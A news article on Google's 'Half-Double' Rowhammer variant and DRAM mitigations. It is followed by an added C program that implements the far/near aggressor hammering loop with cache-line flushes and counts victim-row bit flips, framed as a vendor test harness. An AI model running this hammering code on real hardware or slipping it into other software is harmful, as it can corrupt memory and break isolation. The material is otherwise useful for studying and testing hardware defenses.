A team of security researchers from Google has demonstrated yet another variant of the Rowhammer attack, one that bypasses current defenses to tamper with data stored in memory.
Dubbed "Half-Double," the new hammering technique hinges on the weak coupling between two memory rows that are not immediately adjacent to each other but one row removed, i.e. at a distance of two.
"Unlike TRRespass, which exploits the blind spots of manufacturer-dependent defenses, Half-Double is an intrinsic property of the underlying silicon substrate," the researchers noted.
"This is likely an indication that the electrical coupling responsible for Rowhammer is a property of distance, effectively becoming stronger and longer-ranged as cell geometries shrink down. Distances larger than two are conceivable."
Rowhammer attacks are similar to speculative execution attacks in that both break the fundamental security guarantees made by the underlying hardware. Discovered in 2014, Rowhammer refers to a class of DRAM vulnerabilities whereby repeated accesses to a memory row (the "aggressor") can induce an electrical disturbance large enough to flip bits stored in an adjacent row (the "victim"), thereby enabling untrusted code to escape its sandbox and take control of the system.
Although DRAM manufacturers deployed countermeasures such as Target Row Refresh (TRR), which tracks frequently accessed rows and refreshes their neighbors, to thwart such attacks, the mitigations have been limited to the two immediate neighbors of an aggressor row, thus leaving out memory cells at a two-row distance. These imperfect protections meant that TRR defenses in DDR4 modules could be circumvented to stage new variants of Rowhammer attacks such as TRRespass and SMASH.
The distance-two assisted Rowhammer, aka Half-Double, now joins that list. "Given three consecutive rows A, B, and C, we were able to attack C by directing a very large number of accesses to A, along with just a handful (~dozens) to B," the researchers explained. In this setup, A is the "far aggressor," B is the "near aggressor," and C is the "victim."
Google said it is currently working with the Joint Electron Device Engineering Council (JEDEC), an independent standardization body and semiconductor engineering trade organization, along with other industry partners, to identify possible solutions for Rowhammer exploits.
"To evaluate the effectiveness of a [SoC-level] mitigation, a DRAM vendor should test a combination of hammering distances rather than only testing at individual distances," the researchers said. "In other words, hammering a single row or a pair of sandwiching rows on the raw medium will not exhibit this effect. Instead, pairs of rows on one or both sides of an intended victim need to be hammered."
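The following C program is an added example, not code from Google's research or from any vendor test suite. It ties together the far/near aggressor schedule described above (many accesses to A, a few dozen to B) and the test-coverage point in the last quote, by enumerating the distance combinations a vendor should exercise for a victim row and by implementing the Half-Double access loop with cache-line flushes. Everything platform-specific is assumed: the 8 KiB row size, and above all the mapping from buffer addresses to physical DRAM rows, which the caller must supply (via the controller's address function or a kernel helper) for the pattern to land on real neighbors. The built-in demo hammers ordinary heap memory, whose "rows" are not physically adjacent, so observing zero flips there is the expected outcome, not evidence of a mitigation.

```c
/* Added example: Half-Double access-pattern driver. Not from the Google
 * paper or any vendor tool; row addresses and row size are assumptions. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static inline void flush_line(const void *p) { _mm_clflush(p); }
static inline void mem_fence(void) { _mm_mfence(); }
#else
/* Non-x86 fallback: no user-space line flush, so reads stay cached and never
 * reach DRAM. Present only so the scheduling logic compiles and runs. */
static inline void flush_line(const void *p) { (void)p; }
static inline void mem_fence(void) { __sync_synchronize(); }
#endif

#define HD_ROW_BYTES 8192UL  /* assumed row size for the demo; platform-specific */
#define HD_MAX_PATTERNS 6

/* Aggressor rows for one victim, as row numbers; -1 means "not hammered". */
struct hd_pattern {
    const char *name;
    long far_lo, near_lo, near_hi, far_hi;
};

/* Distance combinations a test should cover for victim row v. The first three
 * are the classic single/double-sided patterns that, per the text, do not show
 * the Half-Double effect; the last three pair a distance-2 "far" aggressor with
 * a distance-1 "near" aggressor on one or both sides. */
size_t hd_patterns_for_victim(long v, struct hd_pattern out[HD_MAX_PATTERNS]) {
    const struct hd_pattern p[HD_MAX_PATTERNS] = {
        { "single-sided, distance 1 (low)",  -1,    v - 1, -1,    -1    },
        { "single-sided, distance 1 (high)", -1,    -1,    v + 1, -1    },
        { "double-sided, distance 1",        -1,    v - 1, v + 1, -1    },
        { "half-double, low side",           v - 2, v - 1, -1,    -1    },
        { "half-double, high side",          -1,    -1,    v + 1, v + 2 },
        { "half-double, both sides",         v - 2, v - 1, v + 1, v + 2 },
    };
    memcpy(out, p, sizeof p);
    return HD_MAX_PATTERNS;
}

/* Same roles as hd_pattern, but as addresses inside the rows; NULL = skip. */
struct hd_rows { volatile uint8_t *far_lo, *near_lo, *near_hi, *far_hi; };

static volatile uint8_t g_sink;  /* keeps the reads observable to the compiler */

static inline unsigned touch(volatile uint8_t *p) {
    if (!p) return 0;
    g_sink += *p;                 /* read misses cache because the line was flushed */
    flush_line((const void *)p);  /* evict so the next read goes to DRAM again */
    return 1;
}

/* Half-Double schedule: every iteration hits the far aggressor(s); the near
 * aggressor(s) are touched only near_n times in total, spread evenly across
 * the run. Returns the number of row accesses actually performed. */
unsigned long hd_hammer(const struct hd_rows *r, unsigned long far_n, unsigned long near_n) {
    unsigned long stride = (near_n && far_n / near_n) ? far_n / near_n : 1;
    unsigned long total = 0, near_done = 0;
    for (unsigned long i = 0; i < far_n; i++) {
        total += touch(r->far_lo) + touch(r->far_hi);
        if (near_done < near_n && i % stride == 0) {
            total += touch(r->near_lo) + touch(r->near_hi);
            near_done++;
        }
        mem_fence();  /* serialize so accesses are not merged or reordered */
    }
    return total;
}

/* Number of bits in the victim row that no longer match the fill value. */
size_t hd_count_flips(const uint8_t *row, size_t len, uint8_t fill) {
    size_t flips = 0;
    for (size_t i = 0; i < len; i++)
        flips += (size_t)__builtin_popcount((unsigned)(row[i] ^ fill));
    return flips;
}

/* Demo: five contiguous heap "rows", victim in the middle, hammered with the
 * both-sides pattern. Heap rows are not DRAM-adjacent, so 0 is expected. */
size_t hd_run_demo(unsigned long far_n, unsigned long near_n) {
    uint8_t *buf = malloc(5 * HD_ROW_BYTES);
    if (!buf) return (size_t)-1;
    memset(buf, 0x00, 5 * HD_ROW_BYTES);
    uint8_t *victim = buf + 2 * HD_ROW_BYTES;
    memset(victim, 0xFF, HD_ROW_BYTES);  /* known fill so any flip is detectable */
    struct hd_rows r = { buf, buf + 1 * HD_ROW_BYTES,
                         buf + 3 * HD_ROW_BYTES, buf + 4 * HD_ROW_BYTES };
    hd_hammer(&r, far_n, near_n);
    size_t flips = hd_count_flips(victim, HD_ROW_BYTES, 0xFF);
    free(buf);
    return flips;
}

int main(void) {
    struct hd_pattern pats[HD_MAX_PATTERNS];
    size_t n = hd_patterns_for_victim(1000, pats);
    for (size_t i = 0; i < n; i++)
        printf("%-36s far_lo=%ld near_lo=%ld near_hi=%ld far_hi=%ld\n", pats[i].name,
               pats[i].far_lo, pats[i].near_lo, pats[i].near_hi, pats[i].far_hi);
    printf("demo flips in victim row: %zu\n", hd_run_demo(100000, 40));
    return 0;
}
```

The schedule is the part worth studying: the far aggressor is hit on every iteration while the near aggressor is touched once every `far_n / near_n` iterations, which is what "a very large number of accesses to A, along with just a handful to B" means in practice. A real harness would replace the heap buffer with memory whose physical rows are known, run each of the six patterns against the same victim, and compare flip counts; the point of the last quote is that only the three half-double patterns can reveal a distance-two weakness, so a suite that stops at the first three cannot certify a mitigation against it.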